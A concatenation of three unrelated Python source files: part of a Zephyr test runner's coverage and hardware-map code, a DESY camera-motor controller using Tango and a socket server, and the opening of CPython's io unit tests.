subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
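# Illustrative sketch of one hardware-map entry as consumed above (field names
# are the ones the code reads and writes; the concrete values are hypothetical):
#
#   - platform: frdm_k64f
#     id: "000123456789"
#     product: DAPLink CMSIS-DAP
#     runner: pyocd
#     serial: /dev/ttyACM0
#     connected: true
#     available: true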
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
screen_motor.py
|
# ----------------------------------------------------------------------
# Author: yury.matveev@desy.de
# ----------------------------------------------------------------------
"""Camera motor class
"""
import socket
import errno, time
import json
import logging
import PyTango
import threading
from io import StringIO
from queue import Queue, Empty
from petra_camera.main_window import APP_NAME
REFRESH_PERIOD = 1
logger = logging.getLogger(APP_NAME)
# ----------------------------------------------------------------------
class MotorExecutor(object):
SOCKET_TIMEOUT = 5
DATA_BUFFER_SIZE = 2 ** 22
def __init__(self, settings):
super(MotorExecutor, self).__init__()
self._my_name = settings.getAttribute("name")
if str(settings.getAttribute("motor_type")).lower() == 'acromag':
self._motor_type = 'Acromag'
server_name = str(settings.getAttribute("valve_tango_server"))
self._valve_device_proxy = PyTango.DeviceProxy(server_name)
if self._valve_device_proxy.state() == PyTango.DevState.FAULT:
raise RuntimeError(f'{server_name} in FAULT state!')
self._valve_channel = int(settings.getAttribute("valve_channel"))
logger.debug(f'{self._my_name}: new Acromag motor: {server_name}:{self._valve_channel}')
elif str(settings.getAttribute("motor_type")).lower() == 'fsbt':
self._motor_type = 'FSBT'
self._motor_name = str(settings.getAttribute("motor_name"))
self._fsbt_server = None
self._fsbt_host = str(settings.getAttribute("motor_host"))
self._fsbt_port = int(settings.getAttribute("motor_port"))
self._fsbt_worker = threading.Thread(target=self.server_connection)
self._fsbt_worker_status = 'running'
self._run_server = True
self._motor_position = None
self._move_queue = Queue()
self._fsbt_worker.start()
logger.debug(f'{self._my_name}: new FSBT motor: {self._motor_name}@{self._fsbt_host}:{self._fsbt_port}')
else:
raise RuntimeError('Unknown type of motor')
# ----------------------------------------------------------------------
def server_connection(self):
if not self.get_connection_to_fsbt():
self._fsbt_worker_status = 'stopped'
return
while self._run_server:
try:
status = self.send_command_to_fsbt('status ' + self._motor_name)
self._motor_position = status[1][self._motor_name] == 'in'
except Exception as err:
logger.error("Error during motor status {}...".format(err))
if not self.get_connection_to_fsbt():
break
try:
result = self.send_command_to_fsbt(self._move_queue.get(block=False))
if not result[0]:
logger.error("Cannot move motor")
except Empty:
pass
except Exception as err:
logger.error("Error during motor move {}...".format(err))
break
time.sleep(REFRESH_PERIOD)
self._fsbt_worker_status = 'stopped'
# ----------------------------------------------------------------------
def stop(self):
if self._motor_type == 'FSBT' and self._fsbt_worker_status != 'stopped':
while not self._move_queue.empty() and self._fsbt_worker_status != 'stopped':
logger.debug(f'{self._my_name}: need to finish motor command queue')
time.sleep(0.1)
self._run_server = False
while self._fsbt_worker_status != 'stopped':
time.sleep(0.1)
logger.debug(f'{self._my_name}: motor worker stopped')
# ----------------------------------------------------------------------
def motor_position(self):
if self._motor_type == 'Acromag':
_currentPos = list('{0:04b}'.format(int(self._valve_device_proxy.read_attribute("Register0").value)))
return _currentPos[3 - self._valve_channel] == "1"
elif self._motor_type == 'FSBT':
return self._motor_position
# ----------------------------------------------------------------------
def move_motor(self, new_state):
logger.debug(f'{self._my_name}: new move command {new_state}')
if self._motor_type == 'Acromag':
_currentPos = list('{0:04b}'.format(int(self._valve_device_proxy.read_attribute("Register0").value)))
current_state = _currentPos[3 - self._valve_channel] == "1"
if current_state != new_state:
if new_state:
_currentPos[3 - self._valve_channel] = "1"
else:
_currentPos[3 - self._valve_channel] = "0"
self._valve_device_proxy.write_attribute("Register0", int("".join(_currentPos), 2))
elif self._motor_type == 'FSBT':
if self._motor_position != new_state:
if new_state:
self._move_queue.put('in {:s}'.format(self._motor_name))
else:
self._move_queue.put('out {:s}'.format(self._motor_name))
else:
raise RuntimeError('Unknown type of motor')
# ----------------------------------------------------------------------
def get_connection_to_fsbt(self):
self._fsbt_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._fsbt_server.settimeout(self.SOCKET_TIMEOUT)
start_timeout = time.time()
time_out = False
is_connected = False
while not time_out and not is_connected:
err = self._fsbt_server.connect_ex((self._fsbt_host, self._fsbt_port))
if err == 0 or err == errno.EISCONN:
is_connected = True
if time.time() - start_timeout > self.SOCKET_TIMEOUT:
time_out = True
return is_connected
# ----------------------------------------------------------------------
def send_command_to_fsbt(self, command):
try:
self._fsbt_server.sendall(str(command).encode())
except Exception as err:
logger.error("Cannot send command to the FSBT server: {}".format(err))
return
start_timeout = time.time()
time_out = False
got_answer = False
ans = ''
while not time_out and not got_answer:
try:
ans = str(self._fsbt_server.recv(self.DATA_BUFFER_SIZE).decode())
got_answer = True
except socket.error as err:
if err.errno != errno.EAGAIN:  # no data available yet; keep polling until timeout
time_out = True
if time.time() - start_timeout > self.SOCKET_TIMEOUT:
time_out = True
if not time_out:
try:
ans = json.load(StringIO(ans))
except Exception as err:
ans = None
return ans
else:
raise RuntimeError("The FSBT server does not respond")
# ----------------------------------------------------------------------
def int_to_bin(self, val):
b = '{0:04b}'.format(val)
l = [0] * 4
for i in range(4):
l[i] = int(b[i], 2)
return l
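# Worked example of the Register0 bit handling used above (values hypothetical):
# Register0 == 5 formats to '0101'; for valve_channel == 0 the state is taken
# from bit [3 - 0] == '1', i.e. the motor is reported as "in"; for
# valve_channel == 1 it is bit [3 - 1] == '0', i.e. "out".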
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
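# A minimal sketch of the pattern described above (hypothetical class names,
# shown only for illustration; the real base tests and their C/Python
# subclasses follow later in this file). The base class refers to the
# implementation under test only through an attribute, and each concrete
# subclass binds that attribute to the C module or to the pure-Python module:
#
#     import unittest
#     import io
#     import _pyio as pyio
#
#     class ExampleBytesIOTests:
#         tp = None  # bound to io.BytesIO or pyio.BytesIO by the subclasses
#
#         def test_roundtrip(self):
#             buf = self.tp()
#             buf.write(b"abc")
#             buf.seek(0)
#             self.assertEqual(buf.read(), b"abc")
#
#     class CExampleBytesIOTest(ExampleBytesIOTests, unittest.TestCase):
#         tp = io.BytesIO
#
#     class PyExampleBytesIOTest(ExampleBytesIOTests, unittest.TestCase):
#         tp = pyio.BytesIO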
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import import_helper
from test.support import os_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support import skip_if_sanitizer
from test.support.os_helper import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
    def byteslike(*pos, **kw):
        """Create a bytes-like object having no string or sequence methods"""
        data = bytes(*pos, **kw)
        obj = EmptyStruct()
        ctypes.resize(obj, len(data))  # grow the empty Structure's buffer to the data size
        memoryview(obj).cast("B")[:] = data  # fill it through the buffer protocol
        return obj
class EmptyStruct(ctypes.Structure):
pass
# Does the io.IOBase finalizer log the exception if the close() method fails?
# The exception is silently ignored by default in release builds.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
requires_alarm = unittest.skipUnless(
hasattr(signal, "alarm"), "test requires signal.alarm()"
)
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
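# For reference, the default RawIOBase.read() that MockRawIOWithoutRead is
# meant to exercise behaves roughly like this simplified sketch (not the exact
# CPython code): it allocates a buffer, delegates to readinto(), and passes a
# None result through for "no data available right now" on non-blocking streams.
#
#     def read(self, size=-1):
#         if size is None or size < 0:
#             return self.readall()
#         b = bytearray(size)
#         n = self.readinto(b)
#         if n is None:
#             return None
#         return bytes(b[:n])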
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w', encoding="utf-8")
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w', encoding="utf-8")
def test_raw_file_io(self):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(os_helper.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(os_helper.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(os_helper.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "a", encoding="utf-8") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with warnings_helper.check_warnings(('', ResourceWarning)):
f = MyFileIO(os_helper.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(os_helper.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w',
encoding="utf-8", closefd=False)
def test_read_closed(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(os_helper.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
